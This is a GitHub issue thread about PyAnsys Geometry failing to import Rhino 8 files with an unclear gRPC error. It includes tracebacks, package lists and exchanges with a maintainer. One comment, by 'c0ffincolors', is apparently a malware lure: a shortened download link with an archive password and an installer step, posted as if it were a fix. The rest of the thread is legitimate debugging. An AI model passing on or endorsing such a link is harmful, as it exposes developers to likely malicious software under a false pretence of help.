ansys/pyansys-geometry #1380: Rhino file version error not clear

dkowollik, 2024-08-27:
### 🔍 Before submitting the issue

- [X] I have searched among the existing issues
- [X] I am using a Python virtual environment

### 🐞 Description of the bug

Somehow the import crashes, if I use a rhino model with a newer rhino file version (Rhino 8). I can import the model with Discovery, SpaceClaim and PyPrimeMesh. I get the following error message:
```python

File ...\lib\site-packages\ansys\geometry\core\errors.py:98, in protect_grpc.<locals>.wrapper(*args, **kwargs)
     96     out = func(*args, **kwargs)
     97 except (_InactiveRpcError, _MultiThreadedRendezvous) as error:  # pragma: no cover
---> 98     raise GeometryExitedError(
     99         f"Geometry service connection terminated: {error.details()}"
    100     ) from None
    102 if threading.current_thread().__class__.__name__ == "_MainThread":
    103     received_interrupt = bool(SIGINT_TRACKER)
GeometryExitedError: Geometry service connection terminated: Operation failed.
``` 
If I convert the Rhino 8 file to Rhino 7, the import works fine. A better error feedback would be helpful. 

### 📝 Steps to reproduce

Use a rhino 8 file for import
[Named_Selection_Rhino_8_Example.zip](https://github.com/user-attachments/files/16765689/Named_Selection_Rhino_8_Example.zip)

### 💻 Which operating system are you using?

Windows

### 📀 Which ANSYS version are you using?

Ansys 2024R2

### 🐍 Which Python version are you using?

3.10

### 📦 Installed packages

```shell
aiohttp==3.9.5
aiosignal==1.3.1
ansys-api-dbu==0.3.3
ansys-api-geometry==0.4.4
ansys-api-mapdl==0.5.1
ansys-api-mechanical==0.1.2
ansys-api-meshing-prime==0.1.3
ansys-api-platform-instancemanagement==1.1.0
ansys-dpf-composites==0.5.0
ansys-dpf-core==0.12.2
ansys-geometry-core==0.6.5
ansys-mapdl-core==0.68.3
ansys-mapdl-reader==0.53.0
ansys-math-core==0.1.5
ansys-mechanical-core==0.11.1
ansys-mechanical-env==0.1.6
ansys-meshing-prime==0.6.2
ansys-platform-instancemanagement==1.1.2
ansys-pythonnet==3.1.0rc3
ansys-tools-path==0.6.0
ansys-tools-visualization-interface==0.2.6
appdirs==1.4.4
asttokens==2.4.1
async-timeout==4.0.3
attrs==23.2.0
beartype==0.18.5
cachetools==5.3.3
certifi==2024.7.4
cffi==1.16.0
charset-normalizer==3.3.2
click==8.1.7
clr-loader==0.2.6
colorama==0.4.6
contourpy==1.2.1
cycler==0.12.1
decorator==5.1.1
exceptiongroup==1.2.2
executing==2.0.1
flexcache==0.3
flexparser==0.3.1
fonttools==4.53.0
frozenlist==1.4.1
geomdl==5.3.1
google-api-core==2.19.1
google-api-python-client==2.136.0
google-auth==2.31.0
google-auth-httplib2==0.2.0
googleapis-common-protos==1.63.2
grpcio==1.64.1
grpcio-health-checking==1.48.2
httplib2==0.22.0
idna==3.7
importlib_metadata==8.0.0
ipython==8.26.0
jedi==0.19.1
kiwisolver==1.4.5
matplotlib==3.9.1
matplotlib-inline==0.1.7
more-itertools==10.3.0
msgpack==1.0.8
multidict==6.0.5
numpy==1.26.4
packaging==24.1
parso==0.8.4
pillow==10.4.0
Pint==0.24.1
platformdirs==4.2.2
pooch==1.8.2
prompt_toolkit==3.0.47
proto-plus==1.24.0
protobuf==3.20.3
psutil==6.0.0
pure_eval==0.2.3
pyansys-tools-versioning==0.5.0
pyasn1==0.6.0
pyasn1_modules==0.4.0
pycparser==2.22
Pygments==2.18.0
pyiges==0.3.1
pyparsing==3.1.2
python-dateutil==2.9.0.post0
pyvista==0.43.10
requests==2.32.3
rsa==4.9
scipy==1.14.0
scooby==0.10.0
semver==3.0.2
six==1.16.0
stack-data==0.6.3
tabulate==0.9.0
tqdm==4.66.4
traitlets==5.14.3
trame==3.6.3
trame-client==3.2.1
trame-server==3.0.3
trame-vtk==2.8.9
trame-vuetify==2.6.1
typing_extensions==4.12.2
uritemplate==4.1.1
urllib3==2.2.2
vtk==9.3.1
wcwidth==0.2.13
websockets==12.0
wslink==2.1.1
yarl==1.9.4
zipp==3.19.2
```

c0ffincolors, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

RobPasMue, 2024-08-28:
Thanks @dkowollik! Let's clarify the scenario if possible :)

Under what conditions is this failing? I am assuming Ansys 24R2 products, specifically the Geometry Service, and via PyAnsys Geometry - right?

Have you tried it using PyAnsys Geometry and Discovery or SpaceClaim? And in that case, does it work? Or have you only tried it using the products in standalone mode (i.e. not through PyAnsys Geometry, but through the traditional GUI)?

dkowollik, 2024-08-28:
If I use the traditional Discovery GUI the error does not occur. 

The error occurs, if you use the below python snippets:
```python
from ansys.geometry.core import launch_modeler_with_geometry_service
modeler = launch_modeler_with_geometry_service()
model = modeler.open_file('Named_Selection_Rhino_8_Example.3dm')
File C:\Python\Python310_64_ansys\lib\site-packages\ansys\geometry\core\errors.py:98, in protect_grpc.<locals>.wrapper(*args, **kwargs)
     96     out = func(*args, **kwargs)
     97 except (_InactiveRpcError, _MultiThreadedRendezvous) as error:  # pragma: no cover
---> 98     raise GeometryExitedError(
     99         f"Geometry service connection terminated: {error.details()}"
    100     ) from None
    102 if threading.current_thread().__class__.__name__ == "_MainThread":
    103     received_interrupt = bool(SIGINT_TRACKER)

GeometryExitedError: Geometry service connection terminated: Operation failed
```

If I use the Python Discovery interface a different error occours. Here the new error occurs also for Rhino 7 files. 

```python
from ansys.geometry.core import launch_modeler_with_discovery
modeler = launch_modeler_with_discovery(hidden=True)
model = modeler.open_file('Named_Selection_Rhino_8_Example.3dm')
File C:\Python\Python310_64_ansys\lib\site-packages\ansys\geometry\core\errors.py:96, in protect_grpc.<locals>.wrapper(*args, **kwargs)
     94 # Capture gRPC exceptions
     95 try:
---> 96     out = func(*args, **kwargs)
     97 except (_InactiveRpcError, _MultiThreadedRendezvous) as error:  # pragma: no cover
     98     raise GeometryExitedError(
     99         f"Geometry service connection terminated: {error.details()}"
    100     ) from None

File C:\Python\Python310_64_ansys\lib\site-packages\ansys\geometry\core\modeler.py:321, in Modeler.open_file(self, file_path, upload_to_server, import_options)
    316 else:
    317     DesignsStub(self._grpc_client.channel).Open(
    318         OpenRequest(filepath=file_path, import_options=import_options.to_dict())
    319     )
--> 321 return self.read_existing_design()

File C:\Python\Python310_64_ansys\lib\site-packages\ansys\geometry\core\modeler.py:206, in Modeler.read_existing_design(self)
    197 """Read the existing design on the service with the connected client.
    198
    199 Returns
   (...)
    202     Design object already existing on the server.
    203 """
    204 from ansys.geometry.core.designer.design import Design
--> 206 design = Design("", self, read_existing_design=True)
    207 self._designs[design.design_id] = design
    208 if len(self._designs) > 1:

File C:\BEWIND\Python310_64_ansys\lib\site-packages\ansys\geometry\core\errors.py:98, in protect_grpc.<locals>.wrapper(*args, **kwargs)
     96     out = func(*args, **kwargs)
     97 except (_InactiveRpcError, _MultiThreadedRendezvous) as error:  # pragma: no cover
---> 98     raise GeometryExitedError(
     99         f"Geometry service connection terminated: {error.details()}"
    100     ) from None
    102 if threading.current_thread().__class__.__name__ == "_MainThread":
    103     received_interrupt = bool(SIGINT_TRACKER)

GeometryExitedError: Geometry service connection terminated: Die Sequenz enthält kein übereinstimmendes Element.
```

RobPasMue, 2024-08-28:
Okay, I will bring this to the server/product development teams. Seems like we might have an issue. Thanks for opening this @dkowollik

RobPasMue, 2025-09-09:
Closing in favor of #1388